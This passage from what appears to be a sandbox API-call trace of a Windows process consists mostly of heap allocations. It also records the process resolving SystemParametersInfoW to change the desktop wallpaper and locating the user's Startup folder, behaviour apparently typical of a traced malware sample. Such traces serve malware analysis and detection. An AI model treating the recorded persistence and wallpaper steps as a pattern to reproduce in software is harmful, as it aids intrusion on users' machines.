RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0231.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0231.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0231.375] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0231.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0231.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0231.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0231.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0231.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0231.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0231.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0231.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0231.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0231.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0231.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0231.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0231.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0231.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0231.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0231.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0231.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0231.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0231.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0231.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0231.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0231.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0231.377] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0231.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0231.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0231.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0231.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f71a0 [0231.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f71a0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0231.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0231.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0231.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0231.377] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0231.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0231.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0231.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0231.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0231.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0231.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0231.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0231.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0231.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0231.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0231.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0231.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0231.378] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0231.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38665d0 [0231.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0231.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0231.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0231.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0231.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0231.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0231.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0231.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0231.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0231.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0231.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0231.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0231.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0231.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0231.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0231.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0231.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0231.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0231.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0231.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0231.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0231.475] FreeLibrary (hLibModule=0x76240000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0231.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0231.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866a20 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38665d0 | out: hHeap=0x2af0000) returned 1 [0231.476] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0231.476] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0231.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0231.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0231.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0231.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0231.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0231.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866a20 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0231.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0231.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0231.478] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0231.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0231.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0231.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0231.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0231.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0231.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0231.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0231.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0231.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0231.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0231.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0231.479] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0231.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0231.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0231.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0231.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0231.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0231.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0231.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0231.479] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0231.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0231.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0231.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0231.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0231.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0231.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0231.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0231.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0231.479] HeapFree (in: 